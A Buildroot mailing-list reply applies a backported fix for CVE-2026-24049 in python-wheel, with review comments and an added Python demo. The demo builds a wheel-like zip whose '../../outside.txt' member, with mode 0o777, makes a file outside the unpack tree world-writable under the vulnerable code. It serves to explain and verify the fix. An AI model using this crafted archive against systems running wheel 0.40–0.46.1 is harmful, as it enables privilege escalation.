From: Thomas Perale via buildroot <buildroot@buildroot.org>
To: Thomas Perale <thomas.perale@mind.be>
Cc: buildroot@buildroot.org
Subject: Re: [Buildroot] [2025.02.x, PATCH 2/2] package/python-wheel: patch CVE-2026-24049
Date: Fri, 27 Mar 2026 11:02:20 +0100
Message-ID: <20260327100220.45873-1-thomas.perale@mind.be>
In-Reply-To: <20260316151301.268215-2-thomas.perale@mind.be>
In reply to:
> Fixes the following vulnerability:
>
> - CVE-2026-24049:
> wheel is a command line tool for manipulating Python wheel files, as
> defined in PEP 427. In versions 0.40.0 through 0.46.1, the unpack
> function is vulnerable to file permission modification through
> mishandling of file permissions after extraction. The logic blindly
> trusts the filename from the archive header for the chmod operation,
> even though the extraction process itself might have sanitized the
> path. Attackers can craft a malicious wheel file that, when unpacked,
> changes the permissions of critical system files (e.g., /etc/passwd,
> SSH keys, config files), allowing for Privilege Escalation or
> arbitrary code execution by modifying now-writable scripts. This issue
> has been fixed in version 0.46.2.
>
> For more information, see:
> - https://www.cve.org/CVERecord?id=CVE-2026-24049
> - https://github.com/advisories/GHSA-8rrh-rw8j-w5fx
>
> Signed-off-by: Thomas Perale <thomas.perale@mind.be>
Applied to 2025.02.x. Thanks
> ---
> ...d-security-issue-around-wheel-unpack.patch | 35 +++++++++++++++++++
> package/python-wheel/python-wheel.mk | 3 ++
> 2 files changed, 38 insertions(+)
> create mode 100644 package/python-wheel/0001-fixed-security-issue-around-wheel-unpack.patch
>
> diff --git a/package/python-wheel/0001-fixed-security-issue-around-wheel-unpack.patch b/package/python-wheel/0001-fixed-security-issue-around-wheel-unpack.patch
> new file mode 100644
> index 0000000000..8640dfa291
> --- /dev/null
> +++ b/package/python-wheel/0001-fixed-security-issue-around-wheel-unpack.patch
> @@ -0,0 +1,35 @@
> +From 7a7d2de96b22a9adf9208afcc9547e1001569fef Mon Sep 17 00:00:00 2001
> +From: =?UTF-8?q?Alex=20Gr=C3=B6nholm?= <alex.gronholm@nextday.fi>
> +Date: Thu, 22 Jan 2026 01:41:14 +0200
> +Subject: [PATCH] Fixed security issue around wheel unpack (#675)
> +
> +A maliciously crafted wheel could cause the permissions of a file outside the unpack tree to be altered.
> +
> +CVE: CVE-2026-24049
> +Upstream: https://github.com/pypa/wheel/commit/7a7d2de96b22a9adf9208afcc9547e1001569fef.patch
> +[thomas: change filename, remove tests]
> +Signed-off-by: Thomas Perale <thomas.perale@mind.be>
> +---
> + src/wheel/cli/unpack.py | 4 ++--
> + 3 files changed, 27 insertions(+), 2 deletions(-)
> +
> +diff --git a/src/wheel/cli/unpack.py b/src/wheel/cli/unpack.py
> +index d48840e6e..83dc7423f 100644
> +--- a/src/wheel/cli/unpack.py
> ++++ b/src/wheel/cli/unpack.py
> +@@ -19,12 +19,12 @@ def unpack(path: str, dest: str = ".") -> None:
> + destination = Path(dest) / namever
> + print(f"Unpacking to: {destination}...", end="", flush=True)
> + for zinfo in wf.filelist:
> +- wf.extract(zinfo, destination)
> ++ target_path = Path(wf.extract(zinfo, destination))
> +
> + # Set permissions to the same values as they were set in the archive
> + # We have to do this manually due to
> + # https://github.com/python/cpython/issues/59999
> + permissions = zinfo.external_attr >> 16 & 0o777
> +- destination.joinpath(zinfo.filename).chmod(permissions)
> ++ target_path.chmod(permissions)
> +
> + print("OK")
> +
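Review bot: the diffstat carried inside the patch file (`3 files changed, 27 insertions(+), 2 deletions(-)`) no longer matches its content after the `[thomas: change filename, remove tests]` trim, which leaves only `src/wheel/cli/unpack.py` with 2 insertions and 2 deletions; regenerate it with `git format-patch` or edit it to `1 file changed, 2 insertions(+), 2 deletions(-)` so the header describes what is applied. The change itself is the right one: `ZipFile.extract()` returns the normalised path it actually wrote, with leading separators and `..` components stripped, so `target_path.chmod(permissions)` now acts on the file inside `destination` rather than on `destination.joinpath(zinfo.filename)`, which resolved the raw archive name through the `..` components. One thing the hunk leaves untouched is `permissions = zinfo.external_attr >> 16 & 0o777`: a member whose `external_attr` carries no Unix mode bits yields `chmod(0)` on the extracted file; that is pre-existing and outside this CVE, but worth a follow-up.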
> diff --git a/package/python-wheel/python-wheel.mk b/package/python-wheel/python-wheel.mk
> index 417db7c167..ae02d21feb 100644
> --- a/package/python-wheel/python-wheel.mk
> +++ b/package/python-wheel/python-wheel.mk
> @@ -13,4 +13,7 @@ PYTHON_WHEEL_LICENSE_FILES = LICENSE.txt
> PYTHON_WHEEL_CPE_ID_VENDOR = wheel_project
> PYTHON_WHEEL_CPE_ID_PRODUCT = wheel
>
> +# 0001-fixed-security-issue-around-wheel-unpack.patch
> +PYTHON_WHEEL_IGNORE_CVES += CVE-2026-24049
> +
> $(eval $(host-python-package))
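Review bot: the `PYTHON_WHEEL_IGNORE_CVES += CVE-2026-24049` line is only valid for as long as the backported `0001-fixed-security-issue-around-wheel-unpack.patch` is applied, so drop both together on the next bump to 0.46.2 or later, where the commit message says the fix is upstream. Since only `host-python-package` is evaluated here, the affected `wheel unpack` path runs on the build host, not on the target; the ignore entry is still needed so pkg-stats stops flagging the patched 0.4x source, and the comment naming the patch file above it is the right way to record why.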
> --
> 2.53.0
>
> _______________________________________________
> buildroot mailing list
> buildroot@buildroot.org
> https://lists.buildroot.org/mailman/listinfo/buildroot
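To see why the chmod target matters, here is an added example (not code from the wheel project, from Buildroot, or from the patch above) that reduces the two versions of the extraction loop to standalone functions and runs each against a constructed archive whose single member is named `../../outside.txt` with mode 0o777 in its `external_attr`. The temporary directory layout, the file names and the `pkg-1.0` destination are assumptions for the demo. `ZipFile.extract()` sanitises the member name and writes the file inside the unpack tree; the pre-fix code then chmods `destination / zinfo.filename`, which resolves through the `..` components to a pre-existing file outside the tree.

```python
"""CVE-2026-24049 in miniature: chmod on the raw archive name versus chmod on
the path ZipFile.extract() actually wrote.  Added example, not wheel's code."""
import stat
import tempfile
import zipfile
from pathlib import Path

# Constructed member: the name escapes the unpack tree, the mode bits in the
# high 16 bits of external_attr ask for a world-writable file.
EVIL_NAME = "../../outside.txt"
EVIL_MODE = 0o777


def build_malicious_archive(path: Path) -> None:
    """Write a wheel-like zip containing one traversal-named member."""
    with zipfile.ZipFile(path, "w") as zf:
        zi = zipfile.ZipInfo(EVIL_NAME)
        zi.external_attr = EVIL_MODE << 16  # unix mode lives in the upper 16 bits
        zf.writestr(zi, b"payload")


def unpack_vulnerable(archive: Path, destination: Path) -> None:
    """Pre-0.46.2 loop: extract() sanitises the name, chmod trusts the raw one."""
    with zipfile.ZipFile(archive) as wf:
        for zinfo in wf.filelist:
            wf.extract(zinfo, destination)  # '..' stripped, file lands inside destination
            permissions = zinfo.external_attr >> 16 & 0o777
            # destination/../../outside.txt resolves outside the unpack tree
            destination.joinpath(zinfo.filename).chmod(permissions)


def unpack_fixed(archive: Path, destination: Path) -> None:
    """0.46.2 loop: chmod the path extract() returned, i.e. the file it wrote."""
    with zipfile.ZipFile(archive) as wf:
        for zinfo in wf.filelist:
            target_path = Path(wf.extract(zinfo, destination))
            permissions = zinfo.external_attr >> 16 & 0o777
            target_path.chmod(permissions)


def mode_of(p: Path) -> int:
    """Permission bits of a file, without the file-type bits."""
    return stat.S_IMODE(p.stat().st_mode)


def run(unpack) -> dict:
    """Build a fresh tree, run one unpack variant, report the resulting modes.

    Assumed layout for the demo:
        tmp/outside.txt         pre-existing victim file, mode 0600
        tmp/unpack/pkg-1.0/     the unpack tree, like wheel's Path(dest) / namever
    """
    with tempfile.TemporaryDirectory() as tmpdir:
        tmp = Path(tmpdir)
        outside = tmp / "outside.txt"
        outside.write_text("victim")
        outside.chmod(0o600)
        archive = tmp / "pkg-1.0-py3-none-any.whl"
        build_malicious_archive(archive)
        destination = tmp / "unpack" / "pkg-1.0"
        unpack(archive, destination)
        inside = destination / "outside.txt"  # where extract() really put the member
        return {
            "outside_mode": mode_of(outside),
            "inside_mode": mode_of(inside),
            "inside_exists": inside.is_file(),
        }


if __name__ == "__main__":
    for label, fn in (("vulnerable", unpack_vulnerable), ("fixed", unpack_fixed)):
        r = run(fn)
        print(f"{label:10s} outside={r['outside_mode']:#o} inside={r['inside_mode']:#o}")
```

Running it shows the vulnerable loop leaving the extracted file with its default creation mode while the unrelated `outside.txt` becomes 0o777; the fixed loop applies 0o777 to the extracted file and leaves `outside.txt` at 0o600. The archive never has to escape the tree on disk for the bug to matter, which is why a sanitised `extract()` alone was not enough.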
Thread overview:
2026-03-16 15:13 [Buildroot] [2025.02.x, PATCH 1/2] package/python-tornado: patch CVE-2025-67724, CVE-2025-67725, CVE-2025-67726 Thomas Perale via buildroot
2026-03-16 15:13 ` [Buildroot] [2025.02.x, PATCH 2/2] package/python-wheel: patch CVE-2026-24049 Thomas Perale via buildroot
2026-03-27 10:02 ` Thomas Perale via buildroot [this message]
2026-03-27 10:02 ` [Buildroot] [2025.02.x, PATCH 1/2] package/python-tornado: patch CVE-2025-67724, CVE-2025-67725, CVE-2025-67726 Thomas Perale via buildroot